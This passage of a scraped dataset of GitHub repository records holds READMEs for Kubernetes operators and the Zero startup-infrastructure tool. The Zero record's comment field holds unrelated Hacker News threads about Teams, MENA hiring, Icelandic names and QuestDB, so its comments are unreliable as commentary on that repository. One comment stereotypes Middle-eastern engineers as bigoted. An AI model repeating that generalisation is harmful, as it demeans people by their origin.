install the operator with a few clicks).\n\nAnd the things on our roadmap:\n\n* Multi-Namespace and Multi-Instance support, allowing the operator to manage not only your Grafana instance, but also any other grafana instance on the cluster, eg. for public facing customer instance.\n\n## Operator flags\n\nThe operator supports the following flags on startup.\nSee [the documentation](./documentation/deploy_grafana.md) for a full list.\nFlags can be passed as `args` to the container.\n\n## Supported Custom Resources\n\nThe following Grafana resources are supported:\n\n* Grafana\n* GrafanaDashboard\n* GrafanaDatasource\n* GrafanaNotificationChannel\n\nall custom resources use the api group `integreatly.org` and version `v1alpha1`.\nTo get an overview of the available grafana-operator CRD see api.md.\n\n### Grafanas\n\nRepresents a Grafana instance. See [the documentation](./documentation/deploy_grafana.md) for a description of properties supported in the spec.\n\n### Dashboards\n\nRepresents a Grafana dashboard and allows specifying required plugins. See [the documentation](./documentation/dashboards.md) for a description of properties supported in the spec.\n\n### Datasources\n\nRepresents a Grafana datasource. See [the documentation](./documentation/datasources.md) for a description of properties supported in the spec.\n\n### Notifiers\n\nRepresents a Grafana notifier. See [the documentation](./documentation/notifiers.md) for a description of properties supported in the spec.\n\n## Development and Local Deployment\n\n### Using the Makefile\n\nIf you want to develop/build/test the operator, here are some instructions how to set up your dev-environment: [follow me](./documentation/develop.md)\n\n## Debug\n\nWe have documented a few steps to help you debug the [grafana-operator](documentation/debug.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ricoberger/vault-secrets-operator", "link": "https://github.com/ricoberger/vault-secrets-operator", "tags": ["kubernetes", "vault", "secret", "secrets", "crd", "operator-sdk", "helm-chart", "kubernetes-secrets", "gitops"], "stars": 532, "description": "Create Kubernetes secrets from Vault for a secure GitOps based workflow.", "lang": "Go", "repo_lang": "", "readme": "
# Vault Secrets Operator\n\nCreate Kubernetes secrets from Vault for a secure GitOps based workflow.\n
\n\nThe **Vault Secrets Operator** creates Kubernetes secrets from Vault. The idea behind the Vault Secrets Operator is to manage secrets in Kubernetes cluster using a secure GitOps based workflow. For more information about a secure GitOps based workflow I recommend the article [\"Managing Secrets in Kubernetes\"](https://www.weave.works/blog/managing-secrets-in-kubernetes) from [Weaveworks](https://www.weave.works). With the help of the Vault Secrets Operator you can commit your secrets to your git repository using a custom resource. If you apply these secrets to your Kubernetes cluster the Operator will lookup the real secret in Vault and creates the corresponding Kubernetes secret. If you are using something like [Sealed Secrets](http://github.com/bitnami-labs/sealed-secrets) for this workflow the Vault Secrets Operator can be used as replacement for this.\n\n## Installation\n\nThe Vault Secrets Operator can be installed via Helm. A list of all configurable values can be found [here](./charts/README.md). The chart assumes a vault server running at `http://vault:8200`, but can be overidden by specifying `--set vault.address=https://vault.example.com`\n\n```sh\nhelm repo add ricoberger https://ricoberger.github.io/helm-charts\nhelm repo update\n\nhelm upgrade --install vault-secrets-operator ricoberger/vault-secrets-operator\n```\n\n### Prepare Vault\n\nThe Vault Secrets Operator supports the **KV Secrets Engine - Version 1** and **KV Secrets Engine - Version 2**. To create a new secret engine under a path named `kvv1` and `kvv2`, you can run the following command:\n\n```sh\nvault secrets enable -path=kvv1 -version=1 kv\nvault secrets enable -path=kvv2 -version=2 kv\n```\n\nAfter you have enabled the secret engine, create a new policy for the Vault Secrets Operator. The operator only needs read access to the paths you want to use for your secrets. To create a new policy with the name `vault-secrets-operator` and read access to the `kvv1` and `kvv2` path, you can run the following command:\n\n```sh\ncat < **Note:** This option is only available for the kubernetes auth method and all roles must be added to the auth method before they are used by the operator.\n\n### Using Vault Namespaces\n\n[Vault Namespaces](https://www.vaultproject.io/docs/enterprise/namespaces) is a set of features within Vault Enterprise that allows Vault environments to support Secure Multi-tenancy (or SMT) within a single Vault infrastructure.\n\nThe Vault Namespace, which should be used for the authentication of the operator against Vault can be specified via the `VAULT_NAMESPACE` environment variable. In the Helm chart this value can be provided as follows:\n\n```yaml\nenvironmentVars:\n - name: VAULT_NAMESPACE\n value: \"my/root/ns\"\n```\n\nThe operator also supports nested Namespaces. When the `VAULT_NAMESPACE` is set, it is also possible to specify a namespace via the `vaultNamespace` field in the VaultSecret CR:\n\n```yaml\napiVersion: ricoberger.de/v1alpha1\nkind: VaultSecret\nmetadata:\n name: kvv1-example-vaultsecret\nspec:\n vaultNamespace: team1\n path: kvv1/example-vaultsecret\n type: Opaque\n```\n\nThe Vault Namespace, which is used to get the secret in the above example will be `my/root/ns/team1`.\n\n### Propagating labels\n\nThe operator will propagate all labels found on the `VaultSecret` to the actual secret. 
So if a given label is needed on the resulting secret it can be added like in the following example:\n\n```yaml\napiVersion: ricoberger.de/v1alpha1\nkind: VaultSecret\nmetadata:\n name: example-vaultsecret\n labels:\n my-custom-label: my-custom-label-value\nspec:\n path: path/to/example-vaultsecret\n type: Opaque\n```\n\nThis would result in the following secret:\n\n```yaml\napiVersion: v1\ndata:\n ...\nkind: Secret\nmetadata:\n labels:\n created-by: vault-secrets-operator\n my-custom-label: my-custom-label-value\n name: example-vaultsecret\ntype: Opaque\n```\n\n## Development\n\nAfter modifying the `*_types.go` file always run the following command to update the generated code for that resource type:\n\n```sh\nmake generate\n```\n\nThe above makefile target will invoke the [controller-gen](https://sigs.k8s.io/controller-tools) utility to update the `api/v1alpha1/zz_generated.deepcopy.go` file to ensure our API's Go type definitons implement the `runtime.Object` interface that all Kind types must implement.\n\nOnce the API is defined with spec/status fields and CRD validation markers, the CRD manifests can be generated and updated with the following command:\n\n```sh\nmake manifests\n```\n\nThis makefile target will invoke controller-gen to generate the CRD manifests at `config/crd/bases/ricoberger.de_vaultsecrets.yaml`.\n\n### Locally\n\nSpecify the Vault address, a token to access Vault and the TTL (in seconds) for the token:\n\n```sh\nexport VAULT_ADDRESS=\nexport VAULT_AUTH_METHOD=token\nexport VAULT_TOKEN=\nexport VAULT_TOKEN_LEASE_DURATION=86400\nexport VAULT_RECONCILIATION_TIME=180\n```\n\nDeploy the CRD and run the operator locally with the default Kubernetes config file present at `$HOME/.kube/config`:\n\n```sh\nmake install run\n```\n\n### Minikube\n\nReuse Minikube's built-in Docker daemon:\n\n```sh\neval $(minikube docker-env)\n```\n\nBuild the Docker image for the operator:\n\n```sh\nmake docker-build IMG=ricoberger/vault-secrets-operator:dev\n```\n\nRun the following to deploy the operator. This will also install the RBAC manifests from `config/rbac`.\n\n```sh\nmake deploy IMG=ricoberger/vault-secrets-operator:dev\n```\n\nDeploy the Helm chart:\n\n```sh\nhelm upgrade --install vault-secrets-operator ./charts/vault-secrets-operator --namespace=vault-secrets-operator --set vault.address=\"$VAULT_ADDRESS\" --set image.repository=\"ricoberger/vault-secrets-operator\" --set image.tag=\"dev\"\n```\n\nFor an example using [kind](https://kind.sigs.k8s.io) you can take a look at the `hack/setup-kind.sh` file.\n\n## Links\n\n* [Managing Secrets in Kubernetes](https://www.weave.works/blog/managing-secrets-in-kubernetes)\n* [Operator SDK](https://github.com/operator-framework/operator-sdk)\n* [Vault](https://www.vaultproject.io)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "commitdev/zero", "link": "https://github.com/commitdev/zero", "tags": ["infrastructure", "technical-founders", "startup"], "stars": 531, "description": "Allow startup developers to ship to production on day 1", "lang": "Go", "repo_lang": "", "readme": "[![Tests](https://circleci.com/gh/commitdev/zero.svg?style=shield)](https://app.circleci.com/pipelines/github/commitdev/zero)\n[![Go Report Card](https://goreportcard.com/badge/commitdev/zero)](https://goreportcard.com/report/commitdev/zero)\n[![Slack](https://img.shields.io/badge/slack-join-brightgreen?logo=slack&style=social)](https://slack.getzero.dev)\n\n
\n\n## What is Zero\n\nZero is an open source tool which makes it quick and easy for startup technical founders and developers to build everything they need to launch and grow high-quality SaaS applications faster and more cost-effectively.\n\nZero sets up everything you need so you can immediately start building your product.\n\nZero was created by [Commit](https://commit.dev).\n## Why is Zero good for startups\n\nAs a technical founder or the first technical hire at a startup, your sole focus is to build the logic for your application and get it into customers\u2019 hands as quickly and reliably as possible. Yet you immediately face multiple hurdles before even writing the first line of code. You\u2019re forced to make many tech trade-offs, leading to decision fatigue. You waste countless hours building boilerplate SaaS features not adding direct value to your customers. You spend precious time picking up unfamiliar tech, make wrong choices that result in costly refactoring or rebuilding in the future, and are unaware of tools and best practices that would speed up your product iteration.\n\nZero was built by a team of engineers with many years of experience in building and scaling startups. We have faced all the problems you will and want to provide a way for new startups to avoid all those pitfalls. We also want to help you learn about the tech choices we made so your team can become proficient in some of the great tools we have included. The system you get starts small but allows you to scale well into the future when you need to.\n\nEverything built by Zero is yours. After using Zero to generate your infrastructure, backend, and frontend, all the code is checked into your source control repositories and becomes the basis for your new system. We provide constant updates and new modules that you can pull in on an ongoing basis, but you can also feel free to customize as much as you like with no strings attached. If you do happen to make a change to core functionality and feel like contributing it back to the project, we'd love that too!\n\nIt's easy to get started, the only thing you'll need is an AWS account. Just enter your AWS CLI tokens or choose your existing profile during the setup process and everything is built for you automatically using infrastructure-as-code so you can see exactly what's happening and easily modify it if necessary.\n\n[Read about the day-to-day experience of using a system set up using Zero](https://getzero.dev/docs/zero/about/real-world-usage)\n\n\n## Why is Zero Reliable, Scalable, Performant, and Secure\n\nReliability: Your infrastructure will be set up in multiple availability zones making it highly available and fault tolerant. All production workloads will run with multiple instances by default, using AWS ELB and Nginx to load balance traffic. All infrastructure is represented with code using [HashiCorp Terraform][terraform] so your environments are reproducible, auditable, and easy to configure.\n\nScalability: Your services will be running in Kubernetes, with the EKS nodes running in an AWS [Auto Scaling Group][asg]. Both the application workloads and cluster size are ready to scale whenever the need arises. Your frontend assets will be stored in S3 and served from AWS' Cloudfront CDN which operates at global scale.\n\nSecurity: Properly configured access-control to resources/security groups, using secret storage systems (AWS Secret Manager, Kubernetes secrets), and following best practices provides great security out of the box. 
Our practices are built on top of multiple security audits and penetration tests. Automatic certificate management using [Let's Encrypt][letsencrypt], database encryption, VPN support, and more means your traffic will always be encrypted. Built-in application features like user authentication help you bullet-proof your application by using existing, tested tools rather than reinventing the wheel when it comes to features like user management and auth.\n\n\n## What do you get out of the box?\n[Read about why we made these technology choices and where they are most applicable.](https://getzero.dev/docs/zero/about/technology-choices)\n\n[Check out some resources for learning more about these technologies.](https://getzero.dev/docs/zero/reference/learning-resources)\n\n### Infrastructure\n- Fully configured infrastructure-as-code AWS environment including:\n - VPCs per environment (staging, production) with pre-configured subnets, security groups, etc.\n - EKS Kubernetes cluster per environment, pre-configured with helpful tools like cert-manager, external-dns, nginx-ingress-controller\n - RDS database for your application (Postgres or MySQL)\n - S3 buckets and Cloudfront distributions to serve your assets\n- Logging and Metrics collected automatically using either Cloudwatch or Prometheus + Grafana, Elasticsearch + Kibana\n- VPN using [Wireguard][wireguard] (Optional)\n- User management and Identity / Access Proxy using Ory [Kratos][kratos] and [Oathkeeper][oathkeeper] (Optional)\n- Tooling to make it easy to set up secure access for your dev team\n- Local/Cloud Hybrid developer environment using Telepresence (Optional)\n\n### Backend\n- Golang or Node.js example project automatically set up, Dockerized, and deployed to your new Kubernetes cluster\n- CI pipeline built with [CircleCI][circleci] or GitHub Actions. Just merge a PR and a deploy will start. Your code will be built and tested, deployed to staging, then prompt you to push to production\n- File upload / download support using signed Cloudfront URLs (Optional)\n- Email support using [SendGrid][sendgrid] or AWS SES (Optional)\n- Notification support for sending and receiving messages in your application (web, mobile, SMS, Email, etc.) (Optional) (In Progress)\n- User management integration with Kratos and Oathkeeper - No need to handle login, signup, authentication yourself (Optional)\n\n### Frontend\n- React example project automatically set up, deployed and served securely to your customers\n- CI pipeline built with CircleCI or GitHub Actions. Just merge a PR and a deploy will start. 
Your code will be built and tested, deployed to staging, then prompt you to push to production\n- File upload / download support using signed Cloudfront URLs (Optional)\n- User management integration with Kratos - Just style the example login / signup flow to look the way you want (Optional)\n- Static site example project using Gatsby to easily make a landing page, also set up with a CI Pipeline using CircleCI (Optional)\n\n___\n\n## Getting Started\n\n[See the getting started guide at the Zero docs site.](https://getzero.dev/docs/zero/getting-started/installation)\n\n### Building blocks of Zero\n\n### Project Definition:\nEach project is defined by this project definition file; this manifest contains your project details and is the source of truth for the templating (`zero create`) and provision (`zero apply`) steps.\n\nSee [`zero-project.yml` reference](https://getzero.dev/docs/zero/reference/project-definition) for details.\n### Module Definition\nThe module definition defines the information needed for the module to run (`zero apply`).\nIt also declares the dependencies used to determine the order of execution with other modules.\n\nSee [`zero-module.yml` reference](https://getzero.dev/docs/zero/reference/module-definition) for details.\n___\n\n\n## Zero Default Stack\n\n[System Architecture Diagram](https://raw.githubusercontent.com/commitdev/zero-aws-eks-stack/main/docs/architecture-overview.svg)\n\nThe core zero modules currently available are:\n| Project | URL |\n|---|---|\n| AWS Infrastructure | [https://github.com/commitdev/zero-aws-eks-stack](https://github.com/commitdev/zero-aws-eks-stack) |\n| Backend (Go) | [https://github.com/commitdev/zero-backend-go](https://github.com/commitdev/zero-backend-go) |\n| Backend (Node.js) | [https://github.com/commitdev/zero-backend-node](https://github.com/commitdev/zero-backend-node) |\n| Frontend (React) | [https://github.com/commitdev/zero-frontend-react](https://github.com/commitdev/zero-frontend-react) |\n| Static Site (Gatsby) | [https://github.com/commitdev/zero-static-site-gatsby](https://github.com/commitdev/zero-static-site-gatsby) |\n\n___\n\n## Contributing to Zero\n\nZero welcomes collaboration from the community; you can open new issues in our GitHub repo, submit PRs for bug fixes, or browse through the tickets currently open to see what you can contribute to.\n\nWe use Zenhub to show us the entire project across all repositories, so if you are interested in seeing that or participating, you can [check out our workspace](https://app.zenhub.com/workspaces/commit-zero-5da8decc7046a60001c6db44/board?repos=203630543,247773730,257676371,258369081,291818252,293942410,285931648,317656612)\n\n### Building the tool\n\n```shell\n$ git clone git@github.com:commitdev/zero.git\n$ cd zero && make build\n```\n\n### Running the tool locally\n\nTo install the CLI into your GOPATH and test it, run:\n\n```shell\n$ make install-go\n$ zero --help\n```\n\n### Releasing a new version on GitHub and Brew\n\nWe are using a tool called `goreleaser` which you can get from brew if you're on macOS:\n`brew install goreleaser`\n\nAfter you have the tool, you can follow these steps:\n```\nexport GITHUB_TOKEN=\ngit tag -s -a -m \"Some message about this release\"\ngit push origin \ngoreleaser release\n```\n\nThis will create a new release in GitHub and automatically collect all the commits since the last release into a changelog.\nIt will also build binaries for various OSes and attach them to the release and push them to brew.\nThe configuration for goreleaser is in 
[.goreleaser.yml](.goreleaser.yml)\n\n\n___\n## FAQ\n\nWhy is my deployed application not yet accessible?\n\n- It takes about 20 - 35 mins for your deployed application to be globally available through AWS CloudFront CDN.\n\n\n[acw]: https://aws.amazon.com/cloudwatch/\n[vpc]: https://aws.amazon.com/vpc/\n[iam]: https://aws.amazon.com/iam/\n[asg]: https://aws.amazon.com/autoscaling/\n[zero binary]: https://github.com/commitdev/zero/releases/\n[and more]: https://github.com/commitdev/zero-aws-eks-stack/blob/master/docs/resources.md\n[terraform]: https://terraform.io\n[letsencrypt]: https://letsencrypt.org/\n[kratos]: https://www.ory.sh/kratos/\n[oathkeeper]: https://www.ory.sh/oathkeeper/\n[wireguard]: https://wireguard.com/\n[circleci]: https://circleci.com/\n[sendgrid]: https://sendgrid.com/\n[launchdarkly]: https://launchdarkly.com/\n", "readme_type": "markdown", "hn_comments": "I kind of like the idea, but feel like there would end up being some bad unexpected consequences. On the other hand, we have lots of that now too :(What horrible software... I switched to running Teams in Edge on Linux awhile ago to get camera blur and it's just as bad as the native client was...Disclaimer: I'm currently part of Tandem.Building a multi platform video conferencing app that is also stable and performant is extremely challenging. I can understand Microsoft's decision. That said, it's unfortunate that Linux users aren't going to have access to a desktop client anymore.If you're looking for a new video conferencing tool, check out www.tandem.chat. We support linux/mac/windows (along with a web app) and we're built from the ground up for hybrid and remote first teams.We're happy to extend an HN discount to any interested teams or answer any questions. Just email me at akash@tandem.chat.If this web app is less of a resource hog than the Teams app on the Mac, I'll switch to it in a heartbeat. Between Teams and Outlook, M$ consumes over one GB of my mac's RAM. If a browser's memory footprint grows by less than that when running those apps (unavoidable, where I work), that'd be a big win over the current status quo, IMHO.Teams has been transformative in the way I work with my team over the last few years, and the pace of development is impressive.But\u2026I cannot understand the absence of core functionality like copy & paste from chats. You can select a few messages (maybe a pageful) but there is no way to take a copy of a whole chat. You can\u2019t print it. You can\u2019t export it. Eventually it just gets lost in deep history, and you can only find it if you remember which keywords were in the text.We resort to filing screenshots, which seems ridiculous.There used to be dozens of threads on UserVoice crying out for this feature, but they all got wiped when the Teams team stopped using that. At the time the statement was \u201cthis is on our backlog\u201d and it had been that way for several years.I\u2019d love an explanation of why.To be fair, I would much prefer a sandboxed webapp then giving Microsoft full access to my system.Wait. \nI have two different team accounts, and you can switch from the app itself but it takes time and you don't receive notifications from the unused account, which makes it useless.\nI also don't have it as a web tab because there are issues with calls and sharing screens this way.So instead I have two team apps installed. One from flatpack and the other from the gnome store (or something like that, don't remember the exact stores).\nAnd they work great! 
Well, they work as awful as the teams app work, but simultaneously without any issue at all.With the PWA can you have multiple independent instances? Please tell me yes...I'm surprised they didn't say \"why don't you just use Windows with WSL? We're trying our best to make sure your IT department forbids you from using anything else anyway\"I had to switch over to running Teams in Edge because it was barely functional otherwise. The only thing I run on edge though is Teams so really barely a change for me.Teams is a cancer. It is the worst windows program i ever worked with.The Teams webapp is by far the slowest and most buggy of any video chat solution clients have asked me to use.In one browser my mic works, but I cannot see screens shared by other people. In another browser it is the reverse. Also it is designed for WebGL which is not available on my OS and the software fallback takes 30 seconds to load and is slow as hell on a beefy 32 core Threadripper.Jitsi, Meet, and others work flawlessly by comparison.Corp propaganda. No one wants extra features. We want basic features working. Client is a hot mess.What's the source for this story please?will it be able to show more than 4 others in a video chat at once? which seems to be another strange limitation of the Linux \"teams\" client.Lots of vitriol in this thread. Wow.I'm grateful that Microsoft is giving Linux desktop a shot. Thanks for remembering us! (No sarcasm. I'm really impressed at how well Office works in Firefox-Linux.)Good, the current client auto starts on boot even though I'm not signed in. I've got to close 3 windows to get the thing to go away every time.This is a load of bull crap from MS (I am fine with a PWA though). Teams is built atop electron. They purposefully kept the Linux version crappy for some reason. Possibly because, if they do one app for Linux, they might have to make other apps as well. Microsoft loves Linux my ass.Good riddance. Can microsoft retire windows and mac apps now as well, please?Seriously, I see zero point of shipping old/buggy chrome bundled with the app (aka \"electron\") for purpose of accessing some centralized service. PWA is the way to go here, yes.Please, for the love of all that is pure, just make Teams a native Windows app instead of this Chromium/Electron crap that feels out of place on any platform, not to mention being dog slow.And please leave Outlook alone. Don't even think about turning it into a junky cross platform web-ish app.Frankly, I'd prefer things like this. After the Zoom security issues came to light, I'd much prefer web apps over native apps, assuming the web apps can be made to be performant on Firefox. The fewer closed-source programs running on my computer, the better.I have used https://github.com/IsmaelMartinez/teams-for-linux before, it is quite a nice experience (better than the official app!) and it might be something suitable when the web client is broken with no clear reason why.(self-promotion ahead)Since the Microsoft Teams client is well known for being quite frankly, terrible, as many have pointed out in this thread, I am working on my own, alternative Teams client: OperCom.I'm building it as a simple, vanilla JS web application, in a SaaS model (since I need to keep bending to Microsoft's will). 
The Teams API isn't great to reverse engineer, but it's do-able and has been done (partially) before, but never to the extent required to create a full-featured app.If anybody's interested, you can see its current status at [1] and keep updated with its progress at [2].[1] https://blog.opercom.co.uk/posts/news-13-08-22/\n[2] https://www.opercom.co.uk/contactArg.As many issues as the Linux version had, using the web version was worse.I guess I shouldn't have expected from to actually follow throughon Teams for Linux.Microsoft Teams is one of the worst desktop apps I've used - on Windows and Mac.You can see how it's built on layers and layers of badly designed compatibility layers and bad engineering decisions.Massive CPU hog, unacceptable side effects (disconnecting Bluetooth devices), super laggy UI and overall poor UX are the headlines.I decided to invest in an alternative VC platform for my business because it was that bad.Oh no, how terrible.Anyway.(It never even worked)What will happen to the Ubuntu snap package, will it be update to a web-app?Interesting decision to shut the software down before the replacement is available to be downloaded.Disappointing to say the leastNo matter what Linux setup I've had over the last years, at some point either my webcam or sound input/output will break. Either permanently from an update or randomly during meetings. Restarting the apps and possibly reconnecting the hardware usually fixes it, maybe a restart.There's this uncertainty that's big enough for me to stick to a Macbook when working.> We hear from you that you want the full richness of Microsoft Teams features on Linux such as background effects, reactions, gallery viewHum... As a Windows Teams user, can you remove those features from the Windows client too?> We hear from you that you want the full richness of Microsoft Teams features on Linux such as background effects, reactions, gallery view, etc.Just to be clear, we don't want any of your shit, let alone the full shit.Not even just an electron Linux app?Is there a link to an official announcement? I can't seem to find one.Hopefully this means it stops prompting me to open links to other channels or comments via xdg-open'ing the desktop app, with no way to make it default to opening them in the website instead.Anyone know if Firefox will be allowed for calls before this switch, or will I still be limited to chrome(ium) browsers?Manara sounds like a beacon of light for the MENA engineers!Congrats to you Laila and Iliana for the launch and I will definitely be sharing this with fellow Tunisian developers :)Just wanted to chime in to share that the original post is great but doesn't do enough justice to the talent. I've been working as an engineer in the Bay Area for 3+ years and found Manara about a year ago. During that time, I've closely mentored 6 engineers and mock interviewed several more. I think nearly every end-of-program mock interview I've given to Manara students are a \"Hire\" with questions of similar difficulty to those used at the big tech company I work for. Having gotten to know them very well now, it's clear to me that these really are a selection of the best engineers in the region (e.g. top performers in competitive programming competitions, hackers with more side projects than university projects, etc).P.S. 
Also worth mentioning that this is some of the most exciting volunteer work I've done...it's a small part of what I do each week but it keeps me disproportionately energized even throughout the rest of my week!There's a big caveat here: Middle-eastern engineers will have significant problems working with more liberal/woke companies. They have a strong tendency to be homophobic/transphobic/misogynist.Last year I fired an off-shored team of 10 otherwise excellent Egyptian engineers because their homophobic statements on LinkedIn and in Slack made people in the company uncomfortable.If your company's engineers lean more right-wing/republican, then middle-eastern engineers are probably a great untapped resource. If your company is more of a Silicon Valley company, they are a liability which can get you sued.Did u consider working with Israelis? I know it sounds far fetched but I'm sure many companies wouldn't rule out hiring Gazans remotely. Whether they can do so legally is another question, probably not.Sounds like a terrific idea. I saw the growth of this sort of thing in Argentina and other South American countries once some companies started investing time and money there. A fair amount of the popularity was attributed to sharing highly overlapping time zones with the US. I imagine this has a similar advantage for European customers.You may get some mileage out of talking with Globant (https://globant.com) or a similar company in South America to hear what their experience was. They have a different model, but do a lot of the same things you've outlined.At Repl.it, we interviewed interns via Manara and was mind-blown by the quality. We've given offers to two and I know at least one will be joining us soon. I think Manara has a potential to transform the global developer market. Very excited for them!Hi, Laila. Congratulations on the launch. I'll share this (Algiers, Algeria).One of the problems people here have is getting paid from companies abroad. I think it would be good to conduct interviews with people who may be having the same problem, and either offer a solution or explain it on the website. Many people work as freelancers, and the way they get their money is Herculean.Also, many, especially here, neither are Arab nor identify as such [native population and ethnicity before 7th century invasions]. Many also do not share the language or other common attributes. Therefore, if you're not ethnicity based, but based on the \"region\", I guess North Africa, and Middle East are the terms that would work better.Again, congratulations. There a lot of very talented people in these countries who will not work abroad for different reasons. Staying not to leave family behind is a very, very, common reason. Making remote work easier for them, whether positions or ease of payment, is huge.This is encouraging even for those who are willing to move but aren't invited to because they haven't reached the skill level required for an employer to incur that cost, and they haven't reached the financial level to incur that cost themselves. I guess your product hits that niche as well.Oh, wonderful!How I wish this works for Africa as well.Here in Africa (Nigeria) to get a good tech job can take like forever... I am so happy you're helping out. Cudos!Hey, thanks for sharing your amazing journey! Whats the best way to contact you?Hey Laila,Congratulations on the launch. Your story is great and I love the premise. 
I myself am the Founder, CEO + CTO of a medical education company working on revolutionizing the future of meded-tech in MENA, so in the near future I'll be looking into hiring from your platform.Be well and good luck!AzibWasalaam ukhti, from the other side of the fence. I'm in Israel, and would love to learn more, and see how I can help from here. It could be one of our small steps that helps move the needle on peace!I'd like to introduce you to some friends in North America who will be very interested. Please check out my profile for an e-mail, and let's talk.Shukraan habibti!It seems like there is correlation between patriarchal societies and having more women developers. I wonder why, maybe because anyway the society is patriarchal so there is not much difference between this field to others unlike in the west where all misogynist white males concentrate in this profession and all the good guys go to law or acting or wherever there are many women and everything is equal and rosy. But then you have to wonder why would those Arab women want to move to a horrible place like the western tech industry instead of removing their shackles and becoming a nurse in a hospital or work in HR of a big corporation, the places where women feel comfortable and equal in the west. It is a bit of a mystery.Speaking from the employer side, can you possibly mention some salary levels?\nI know the topic is sensitive and difficult, but giving some indication here or on the website would be great. This is hopefully competitive with other low-cost locations for react//dashboards/enterprise-java etcSo in the past I read something similar. It's similar business but for Africa: https://techcrunch.com/2019/01/23/connecting-african-softwar...Then something similar showed up again. But this time the business is for Europe, Asia and Latin America: https://techcrunch.com/2018/05/23/youteam/Then I joked with my friend: \"Maybe you should build something similar but for South-East Asia.\" (We live in SEA.)Then the similar business showed up again today but for Middle East and North America. So I guess it's about time when something similar shows up but for SEA (or other parts of the world). :)Great initiative Laila!Interesting that the proportion of female CS students is so high in those countries, I imagine it's more like 10% in most Western countries. Based on you inside perspective, do you have any theories about why this is so?Anecdotally, I've worked for a lot of startups in Scandinavia, and one in Jordan, and that one had the most women!Keeping you guys in mind the next time someone asks me for MENA talent. And if I want to hire some myself!Congrats on the launch, Laila and Iliana!Quick question: why are the companies with on-site jobs restricted to Europe and Canada (if they are in fact restricted)?Thanks!I love this because it empowers people in the MENA region to establish financial security and grow their careers at global tech companies. This will hopefully unlock resources for the much-needed entrepreneurship growth in the regionOh man, the name is unfortunate. It's slang for \"babe\" (for girls) in Greek. Also the last name of one of the most famous erotic comic artists (Milo Manara). 
Fun times!In case any of the people you are working with are interested in open source, please direct them at FOSSjobs and our resources wiki page:https://www.fossjobs.net/\nhttps://github.com/fossjobs/fossjobs/wiki/ResourcesIt reminds me of the time that a \"committee\" of Vikings decided to name Iceland \"Iceland\" even though Greenland is much icier. Damn near got 'em!Anachronistic, comically out of date, and in this day and age, repellent? That a boy cannot be called \"Sue\" strikes an American as a fundamental attack on personal rights.Has there been a string of Iceland articles recently, or am I suffering from recency illusion?My context: https://en.wikipedia.org/wiki/GIUK_gapWhat are some names that were rejected?Do you measure performance vs k/shakti?> https://news.ycombinator.com/item?id=22803504As I already said or rather asked there: Assume I already use Clickhouse for example. What are the benefits of QuestDB? Why should I use it instead?Surely it's a good tech and competition is key. But what are the key points that should make me look into it? There is a lot of story about the making and such, but I don't see the \"selling point\".This looks great, but more importantly good luck! There seems to be market need for this and it looks a solid implementation at first glance. You're off to a good start. I hope you and your team are successful!Congrats! I've been looking for a time series database but most of them seems to be in-memory nosql databases. QuestDB might be exactly what I need. I'll definitely give it a try soon!Testing out the demo:SELECT * FROM trips\nWHERE tip_amount > 500\nORDER BY tip_amount DESCVery interesting :-)https://try.questdb.io:9000/ is downThis is great! Quick question: would you mind sharing why you went with Java vs something perhaps more performant like all C/C++ or Rust? I'd suspect language familiarity (which is 100% ok).Hi Vlad - your anecdote about ship tracking is interesting (my other startup is an AIS based dry freight trader). You must know the Vortexa guys given your BP background.How does QuestDB differ from other timeseries/OLAP offerings? I'm not entirely clear.How does your performance compare to Atlas? [0][0] https://github.com/Netflix/atlasI'm curious how QuestDB handles dimensions. OLAP support with reasonably large number of dimensions and cardinality in the range of at least thousands is a must for modern-day time series database. Otherwise, what we get is only incremental improvement to Graphite -- a darling among startups, I understand, but a non-scalable extremely hard to use timeseries database nonetheless.A common flaw I see in many time-series DBs is that they store one time series per combination of dimensions. As a result, any aggregation will result in scanning of potentially millions of time series. If any time-series DB claims that it is backed up by a key-value store, say, Cassandra, then the DB will have the aforementioned issue. For instance, Uber's M3 used to be backed up by Cassandra, and therefore would give this mysterious warning that an aggregation function exceeded the quota of 10,000 time series, even though from user's point of view the function dealt with a single time series with a number of dimensions.Impressive. Can we talk?Awesome!\nCould you share a bit about business model?I am still hoping to see comparisons to Victoria Metrics, which also shows much better performance than many other TSDB. Victoria Metrics is Prometheus compatible whereas Quest now supports Postgres compatibility. 
Both have compatibility with InfluxDB.The Victoria Metrics story is somewhat similar where someone tried using Clickhouse for large time series data at work and was astonished at how much faster it was. He then made a reimplementation customized for time series data and the Prometheus ecosystem.Can you add a tldr?Any plans on integration with Apache Arrow?The database aside entirely, that story was a really fun read. Thanks for writing it up and sharing. Rooting for you!Stories like these help a product to get traction. Every founder/creator must come up with a story related to the product.Congrats!I see this as a very interesting project. I use ClickHouse as OLAP and I'm very happy with it.\nI can tell you features that make me stick to it. If some day QuestDB offers them, I might explore the possibility to switch but never before.\n- very fast (I guess we're aligned here)\n- real time materialized views for aggregation functions (this is absolutely a killer feature that makes it quite pointless to be fast if you don't have it)\n- data warehouse features: I can join different data sources in one query. This allows me to join, for instance, my MySQL/MariaDB domain dB with it and produce very complete reports.\n- Grafana plugin\n- very easy to share/scale at table level\n- huge set of functions, from geo to URL, from ML to string manipulation\n- dictionaries: I can load maxdb geo dB and do real time localisation in queries\nI might add some more once they come to my mind.\nHaving said this, good job!!!Loved the story and the product!Can you talk about some of the ideal use cases for a time series db? Versus Postgres or a graph database.There's an opportunity for a tool that combines this sort of technology in the backend with a spreadsheet-like GUI powered by formulas and all the user friendliness that comes with a non-programmer interface. Wall Street would forever be changed. Source: I'm one of the poor souls fighting my CPU and RAM to do the same thing with Excel and non-native add-ins by {FactSet, Capital IQ, Bloomberg}This stuff SELECT * FROM balances\n LATEST BY balance_ccy, cust_id\n WHERE timestamp <= '2020-04-22T16:15:00.000Z'\n AND NOT inactive;\n\nMakes me literally want to cry for knowing what is possible yet not being able to do this on my day job :(Congrats on the launch!One question, there are many open source database startups that make it easy to scale on the cloud. However, when you look into the offering, the scaling part is never actually open source and you end up paying for non open source stuff just like any other proprietary database. So I guess my question is, are you planning to go open core too or will you remain open source with some SaaS offering? Good luck to you!Amazing story and congrats on all the progress!Shameless plug: if you'd like to try it out in a production setting, we just created a one-click install for it:https://github.com/render-examples/questdbYour story is very inspiring. I wish you all the best with this project.I noticed there is \"Clustering\" mentioned under enterprise features, but I can't seem to find any references to it in the documentation. Is this something that will be strictly closed 